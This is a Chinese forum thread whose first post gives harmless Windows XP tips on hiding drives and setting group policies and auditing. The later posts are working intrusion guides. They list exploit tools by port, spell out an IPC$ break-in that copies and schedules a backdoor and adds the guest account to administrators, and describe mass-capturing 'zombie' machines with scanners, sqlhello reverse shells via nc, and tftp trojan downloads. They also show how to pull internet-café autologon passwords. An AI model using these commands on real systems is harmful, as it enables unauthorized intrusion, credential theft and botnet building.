  此后,我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。
  第二招:巧妙隐藏硬盘
  在“按Web页”查看方式下,进入Windows目录时都会弹出一句警告信息,告诉你这是系统文件夹如果“修改该文件夹的内容可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件”,这时单击“显示文件”就可以进入该目录了。
  原因是在Windows根目录下有desktop.ini和folder.htt两个文件作祟。将这两个文件拷贝到某个驱动器的根目录下(由于这两个文件是隐藏文件,之前必须在文件夹选项中单击“查看”标签,选择“显示所有文件”,这样就可以看见这两个文件了)。再按“F5”键刷新一下,看看发生了什么,是不是和进入Windows目录时一样。
  接下来我们用“记事本”打开folder.htt,这是用HTML语言编写的一个文件,发挥你的想像力尽情地修改吧。
  如果你不懂HTML语言也没关系,先找到“显示文件”将其删除,找到“修改该文件夹的内可能导致程序运行不正常,要查看该文件夹的内容,请单击显示文件”,将其改为自己喜欢的文字,例如“安全重地,闲杂人等请速离开”。
  将“要查看该文件夹的内容,请单击”改为“否则,后果自负!”,接着向下拖动滑块到倒数第9行,找到“(file://%TEMPLATEDIR%\\wvlogo.gif)”这是显示警告信息时窗口右下角齿轮图片的路径,将其改为自己图片的路径,例如用“d:\\tupian\\tupian1.jpg”替换“//”后面的内容,记住这里必须将图片的后缀名打出,否则将显示不出图片。
  当然,你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果,然后只要将原文件拷贝到下面这段文字的后面,覆盖掉原文件中“~”之间的内容就可以了。
  *ThisfilewasautomaticallygeneratedbyMicrosoftInternetEXPlorer5.0
  *usingthefile%THISDIRPATH%\\folder.htt.
  保存并退出,按“F5”键刷新一下,是不是很有个性?接下来要作的就是用“超级兔子”将你所要的驱动器隐藏起来,不用重新启动就可以欣赏自己的作品了。最后告诉大家一招更绝的,就是干脆将folder.htt原文件中“~”之间的内容全部删除,这样就会给打开你的驱动器的人造成一种这是一个空驱动器的假象,使其中的文件更安全。
  第三招:禁用“开始”菜单命令
  在Windows2000/XP中都集成了组策略的功能,通过组策略可以设置各种软件、计算机和用户策略在某种方面增强系统的安全性。运行“开始→运行”命令,在“运行”对话框的“打开”栏中输入“gpedit.msc”,然后单击“确定”按钮即可启动WindowsXP组策略编辑器。
  在“本地计算机策略”中,逐级展开“用户配置→管理模板→任务栏和开始菜单”分支,在右侧窗口中提供了“任务栏”和“开始菜单”的有关策略。
  在禁用“开始”菜单命令的时候,在右侧窗口中,提供了删除“开始”菜单中的公用程序组、“我的文档”图标、“文档”菜单、“网上邻居”图标等策略。清理“开始”菜单的时候只要将不需要的菜单项所对应的策略启用即可,比如以删除“我的文档”图标为例,具体操作步骤为:
  1)在策略列表窗口中用鼠标双击“从开始菜单中删除我的文档图标”选项。
  2)在弹出窗口的“设置”标签中,选择“已启用”单选按钮,然后单击“确定”即可。
  第四招:桌面相关选项的禁用
  WindowsXP的桌面就像你的办公桌一样,有时需要进行整理和清洁。有了组策略编辑器之后,这项工作将变得易如反掌,只要在“本地计算机策略”中展开“用户配置→管理模板→桌面”分支,即可在右侧窗口中显示相应的策略选项。
  1)隐藏桌面的系统图标
  倘若隐藏桌面上的系统图标,传统的方法是通过采用修改注册表的方式来实现,这势必造成一定的风险性,采用组策略编辑器,即可方便快捷地达到此目的。
  若要隐藏桌面上的“网上邻居”和“InternetEXPlorer”图标,只要在右侧窗口中将“隐藏桌面上网上邻居图标”和“隐藏桌面上的InternetEXPlorer图标”两个策略选项启用即可。如果隐藏桌面上的所有图标,只要将“隐藏和禁用桌面上的所有项目”启用即可。
  当启用了“删除桌面上的我的文档图标”和“删除桌面上的我的电脑图标”两个选项以后,“我的电脑”和“我的文档”图标将从你的电脑桌面上消失了。如果在桌面上你不再喜欢“回收站”这个图标,那么也可以把它给删除,具体方法是将“从桌面删除回收站”策略项启用。
  2)禁止对桌面的某些更改
  如果你不希望别人随意改变计算机桌面的设置,请在右侧窗口中将“退出时不保存设置”这个策略选项启用。当你启用这个了设置以后,其他用户可以对桌面做某些更改,但有些更改,诸如图标和打开窗口的位置、任务栏的位置及大小在用户注销后都无法保存。
  第五招:禁止访问“控制面板”
  如果你不希望其他用户访问计算机的控制面板,你只要运行组策略编辑器,并在左侧窗口中展开“本地计算机策略→用户配置→管理模板→控制面板”分支,然后将右侧窗口的“禁止访问控制面板”策略启用即可。
  此项设置可以防止控制面板程序文件的启动,其结果是他人将无法启动控制面板或运行任何控制面板项目。另外,这个设置将从“开始”菜单中删除控制面板,同时这个设置还从Windows资源管理器中删除控制面板文件夹。
  提示:如果你想从上下文菜单的属性项目中选择一个“控制面板”项目,会出现一个消息,说明该设置防止这个操作。
  第六招:设置用户权限
  当多人共用一台计算机时,在WindowsXP中设置用户权限,可以按照以下步骤进行:
  1)运行组策略编辑器程序。
  2)在编辑器窗口的左侧窗口中逐级展开“计算机配置→Windows设置→安全设置→本地策略→用户权限指派”分支。
  3)双击需要改变的用户权限,单击“添加用户或组”按钮,然后双击想指派给权限的用户账号,最后单击“确定”按钮退出。
  第七招:文件夹设置审核
  WindowsXP可以使用审核跟踪用于访问文件或其他对象的用户账户、登录尝试、系统关闭或重新启动以及类似的事件,而审核文件和NTFS分区下的文件夹可以保证文件和文件夹的安全。为文件和文件夹设置审核的步骤如下:
  1)在组策略窗口中,逐级展开右侧窗口中的“计算机配置→Windows设置→安全设置→本地策略”分支,然后在该分支下选择“审核策略”选项。
  2)在右侧窗口中用鼠标双击“审核对象访问”选项。
  3)用鼠标右键单击想要审核的文件或文件夹,选择弹出菜单的“属性”命令,接着在弹出的窗口中选择“安全”标签。
  4)单击“高级”按钮,然后选择“审核”标签。
  5)根据具体情况选择你的操作:
  倘若对一个新组或用户设置审核,可以单击“添加”按钮,并且在“名称”框中键入新用户名,然后单击“确定”按钮打开“审核项目”对话框。
  要查看或更改原有的组或用户审核,可以选择用户名,然后单击“查看/编辑”按钮。
  要删除原有的组或用户审核,可以选择用户名,然后单击“删除”按钮即可。
  6)如有必要的话,在“审核项目”对话框中的“应用到”列表中选取你希望审核的地方。
  7)如果想禁止目录树中的文件和子文件夹继承这些审核项目,选择“仅对此容器内的对象和/或容器应用这些审核项”复选框。
  注意:必须是管理员组成员或在组策略中被授权有“管理审核和安全日志”权限的用户可以审核文件或文件夹。在WindowsXP审核文件、文件夹之前,你必须启用组策略中“审核策略”的“审核对象访问”。否则,当你设置完文件、文件夹审核时会返回一个错误消息,并且文件、文件夹都没有被审核。
回复 支持 反对

使用道具 举报

 楼主| 发表于 2008-11-1 14:21:03 | 显示全部楼层
各种端口的入侵方法(每日2篇-010)
1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPas*.**e 进行字典暴破(字典是关键)
最后 SQLTool*.**e入侵

对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器

3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)

4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(啊D的注入软件)。

5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码

6. 554端口
用real554.exe入侵。

7. 6129端口
用DameWare6129.exe入侵。

8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。

9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
经典IPC$入侵
1. C:\\>net use \\\\127.0.0.1\\IPC$ \"\" /user:\"admintitrators\"
这是用\"流光\"扫到的用户名是administrators,密码为\"空\"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连

接,因为密码为\"空\",所以第一个引号处就不用输入,后面一个双引号里的是用户名

,输入administrators,命令即可成功完成。
  
2. C:\\>copy srv.exe \\\\127.0.0.1\\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的

c:\\winnt\\system32\\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。


  
3. C:\\>net time \\\\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
  
4. C:\\>at \\\\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
  
5. C:\\>net time \\\\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备

开始下面的命令。
  
6. C:\\>telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的

是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打

算建立一个Telnet服务!这就要用到ntlm了
  
7.C:\\>copy ntlm.exe \\\\127.0.0.1\\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
  
8. C:\\WINNT\\system32>ntlm
输入ntlm启动(这里的C:\\WINNT\\system32>指的是对方计算机,运行ntlm其实是让这

个程序在对方计算机上运行)。当出现\"DONE\"的时候,就说明已经启动正常。然后使

用\"net start telnet\"来开启Telnet服务!

9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作

一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组
10. C:\\>net user guest /active:yes
将对方的Guest用户激活

11. C:\\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码

12. C:\\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我

们可以用guest再次访问这台计算机)
回复 支持 反对

使用道具 举报

 楼主| 发表于 2008-11-1 14:21:20 | 显示全部楼层
大量肉鸡等你来逮(每日2篇-011)
大量的肉鸡等你来逮-----要的是方法


大家好:
      我在这里想把我逮肉鸡的方法和大家分享一下
我逮肉鸡一般有以下常用的方法  一般都是批量的逮肉鸡
  1:1433端口的溢出
  工具:QQIP地址查询器  http://www.91xz.cn/Software.asp?id=3586
        S扫描器        http://www.91xz.cn/Software.asp?id=3582
        X-Scan          http://www.91xz.cn/Software.asp?id=3581
        nc.exe         
        sqlhello.exe

      用QQIP地址查询器查询你想要的地方的肉鸡IP地址段,然后用S扫描器扫描1433端口并保存结果
      扫到后整理。。 导出。 替换为溢出的格式!!比如我扫到了。。
      92.168.0.1:1433
      溢出的格式就是: sqlhello.exe 192.168.0.1 1433 本机IP(公网的) 556 保存为bat文件
      打开NC监听本地端口如556 现在运行那个bat文件!
      呵!!看着有没有shell返回。
      我试过不到两分钟就返回了一个。。

    这时候你先ctrl+c 停下那个bat 的运行。。

    查看一下。那个shell的系统再说!

  type c:\\boot.ini

    如果是2003服务器版的。

  呵。。

  很快的就成为我们的肉鸡了!

  tftp -i 下载的IP get 传的马 放的地方
  如果你不想给他装个马上的话你可以把这执行这段命令
  这段命令的意思是开如果是服务器的话就开的3389不过你先要给自己在里面建设个帐户
  这样你的肉鸡就有了

  2:1433端口SA空密码

      QQIP地址查询器  http://www.91xz.cn/Software.asp?id=3586

      S扫描器        http://www.91xz.cn/Software.asp?id=3582

      X-Scan        http://www.91xz.cn/Software.asp?id=3581

      SQL综合工具包  http://www.91xz.cn/Software.asp?id=3584

用QQIP地址查询器查询你想要的地方的肉鸡IP地址段,

S扫描器扫描1433端口并保存结果保存的

格式是里面只能有IP地址的格式如:

23.22.36.5

26.33.96.8

这样的格式然后把修改的结果导入X-Scan

然后在 X-Scan扫描的选项中只选择AS弱口令项

启动X-Scan过不了几分钟就可以看到SA为弱口令的计算机并且大部分都是 服务器

用SQL综合工具包连接SA为弱口令的计算机这个时候你的权限是最高的你想干什么就干什么

(如果连接上了不可以执行命令那你就换一个计算机因为别人可能已经做了安全防护)

然后执行  type c:\\boot.ini

    如果是2003服务器版的。

  呵。。

  很快的就成为我们的肉鸡了!

  tftp -i 下载的IP get 传的马 放的地方
  如果你不想给他装个马上的话你可以把这执行这段命令
  这段命令的意思是开如果是服务器的话就开的3389不过你先要给自己在里面建设个帐户
  这样你的肉鸡就有了

3:4899肉鸡的空口令  

  QQIP地址查询器    http://www.91xz.cn/Software.asp?id=3586

  4899空口令探测器  http://www.91xz.cn/Software.asp?id=3583

  S扫描器扫描      http://www.91xz.cn/Software.asp?id=3582

  影子影        http://www.91xz.cn/Software.asp?id=3587

用QQIP地址查询器查询你想要的地方的肉鸡IP地址段,然后用S扫描器扫描14899端口并保存结果

导入4899空口令探测器,并记录下结果

最后用 影子影软件连接上,这样你就又有了台肉鸡了爽啊????


4:缓冲溢出
入侵的方法很多,但对网吧入侵最常用的方法是什么呢?首先,自动登陆。现在网吧一般都是win2000或者windows xp的机器,网管一般都把机子设置为自动登陆!


   这样我们开机进入系统的时候登陆窗口一闪而过!着时候如果我们findfass.exe试图把登陆账号密码找出来是不会成功的!因为账号密码根本不在内存中,而findfass.exe通过winlogon的PID号和正确的域名中,在内存寻找好段加了密的内存块(保存着加密过的登陆密码),然后对它进行解密,这样就能得到明文的密码。实际上自动登陆的账号密码都在注册表中。我们打开注册表HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogon这个目录下,AutoAdminLogon这一项的键值为1,表示自动登陆。

  为1的时候,打开控制面板的用户和密码,会发现需要密码前面的钩已经去掉了。DefaultUserName对应的键值就是登陆用户名,DefaultPassword对应的键值就是登陆密码。实际上海洋顶端木马2006就有着一功能,原理是一样的,不过因为权限的问题,不一定能读出来。这样,密码账号我们都找出来了。而且你要知道,一个网吧的自动登陆密码账号一般都是一样的,而且网管为了方便网虫上网一般把他们设置在管理员组,至少user组。

  知道了密码账号还愁入侵不了么?网吧机子的server服务一般是禁用的,那我们就不能用ipc入侵了。opentelnet.exe我们也用不了,因为着个也依赖ipc连接,dameware远程控制也不行,道理一样。我们可以用recton着个小巧实用的工具来开telnet,这个工具在win2000下面特别好使。如图1。

  开了telnet后,我们telnet上去,先在本机打开tftpd32.exe,再telnet下面telnet -i myip get3721.exec:3721.exe,这样就把我们的木马3721.exe比如radmin传过去了。如图2。再在telnet下面直接运行3721.exe就ok了。

  另一个方法就是ms04011漏洞,别以为着个漏洞已经过时了,在网吧这个漏洞还是相当普遍的,许多网吧的网管只会装游戏,重装系统,不重视着写漏洞,懒得打补丁!我们用DSScan扫描192.168.0.1-192.168.0.255,一般会你会很惊喜的。我们到用ms04011溢出工具溢出,一下子就得到了系统权限。

还有很多入侵方法,你可以把xscan搬出来扫描一下。很多菜鸟喜欢用啊D工具包来扫网吧的空口令,实际上这个工具扫用户账号密码很弱,以前我试过,我用上面第一种方法发现网吧都有一个密码为空的管理员账号,用啊D工具包只扫出几台机子有这个账号。我经常用我的最爱闪电狐——火狐端口扫描器来扫一下网吧主机,第一服务器等。着个扫描器速度很快,扫1到10000端口也要不了几分钟。如果发现服务器开80断口,自然是看是不是架设了网站。再看网站十分有漏洞,想办法传个asp木马上去提升权限。如果发现电影服务器装了serv_u,而且你有了一个账号,可以尝试一下serv_u的溢出。
回复 支持 反对

使用道具 举报

 楼主| 发表于 2008-11-1 14:22:16 | 显示全部楼层
黑客告诉你木马生成器不能随便碰(每日2篇-012)
      前一阵子,在一些论坛里看到有些人,介绍他们盗QQ、游戏密码的木马,只要设置好E-mail的用户名及该E-mail的密码,就可以盗号了。是否知道这个木马是包含后门的?在你用它来帮你盗号的同时,盗取的用户名及密码也都会发送给木马作者一份,而我们就是要利用嗅探工具来得到这个木马作者所用E-mail的用户名及密码。然后,来个“为民除害”。最后希望大家不要使用木马,不然害人的同时还会害己(有些木马还会盗取你的账号及密码)。
下面就以一款针对某网络游戏的木马来做分析,来看看如何得到木马中的一些“隐藏”信息。首先要准备的一些必要的工具:
                        
  ①下载我们所需要的嗅探工具,解压后得到xsniff.exe;

  ②一个传奇木马软件,网络上有很多。

  下面就来开始抓获这个木马中的谍中谍。

  第一步:点击“开始→运行”,输入“CMD”(不含引号),打开“命令提示符窗口”。

  第二步:进入嗅探工具所在目录,输入“xsniff.exe -pass -hide -log pass.log”(不含引号),这样局域网里的明文密码(包括本机)都会被记录到pass.log中。

  第三步:下面打开该网游的木马,输入你的邮箱地址,点击发送测试邮件的按钮,显示发送成功后,再打开生成的pass.log文件(括号内的文字为注释,并不包含在pass.log文件中):

QUOTE:
TCP [04/08/04 19:14:10]
61.187.***.160->202.102.***.114 Port: 1140->25
(前面的IP是发信人的IP地址,后面的IP是接收方的IP地址,PORT是指端口)
USER: ZXhlY3V0YW50[admin]
(USER是信箱用户名,前面的ZXhlY3V0YW50为加密的数据,后面[]内的为用户ID)

TCP [04/08/04 19:14:10]
61.187.***.160->202.102.***.114 Port: 1140->25
PASS: YWRtaW5zdXA=[adminsup]
(PASS是邮箱的密码,YWRtaW5zdXA=为加密数据,后面[]内的为密码)

TCP [04/08/04 19:14:10]
61.187.***.160->202.102.***.114 Port: 1140->25
MAIL FROM:
(类似于发邮件时的信息,指信息发送的目的邮箱)
TCP [04/08/04 19:14:10]
61.187.***.160->202.102.***.114 Port: 1140->25
RCPT T <1@1.***>
(测试信箱的地址)

  第四步:现在我们已经知道了这个木马是使用admin@1234.***邮箱来发信的,用户名是admin,密码是adminsup。于是,进入这个邮箱,删掉那些信吧。

  第五步:不要以为这就结束了,木马是狡猾的,很多木马还包含一个隐藏后门。执行刚刚生成的木马服务器端(没有手动清理病毒能力的读者请勿轻易尝试,并对系统进行备份,以便还原)。

  第六步:使用前面的命令,让xsniff开始嗅探,进入该游戏,随便申请一个ID,接着退出,再去看看pass.log文件。

QUOTE:
TCP [04/08/04 19:20:39]
61.187.***.160->61.135.***.125 Port: 1157->25
PASS: YWRtaW5zdXA=[admin]

TCP [04/08/04 19:20:40]
61.187.***.160->61.135.***.125 Port: 1157->25
MAIL FROM:

  看到了吗?木马终于漏出了狐狸尾巴,用户名为admin,密码为admin,邮箱是为admin@12345.***,这个邮箱才是作者的后门程序,木马真正的后门。

  第七步:最后,将该邮箱里的盗号邮件清除,然后恢复系统
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

蓝色动力网络微信平台
网站管理,业务合作联系邮箱: admin#lansedongli.com    QQ:13412492 限网站业务问题.
网站帐号、密码、密保找回请使用注册邮箱,发送邮件至 password#lansedongli.com ,否则不予受理.
免责声明:本论坛所有文字和图片仅代表其个人观点.
本站某些资料或文章来自于互联网,不代表本站观点,如果侵犯了您的权益,请来信告知,我们会在三天内删除.
为了给大家一个更好的交流场所,请勿在本论坛发表与中华人民共和国法律相抵触的言论,请合作,谢谢!
Copyright © 2007-2019 Corporation Powered by网吧系统 版权所有    转载请注明!
浙ICP备11043737号-1 程序:Discuz! x3.4

湘公网安备 43018102000145号

手机版|Archiver|蓝色动力网络   

快速回复 返回顶部 返回列表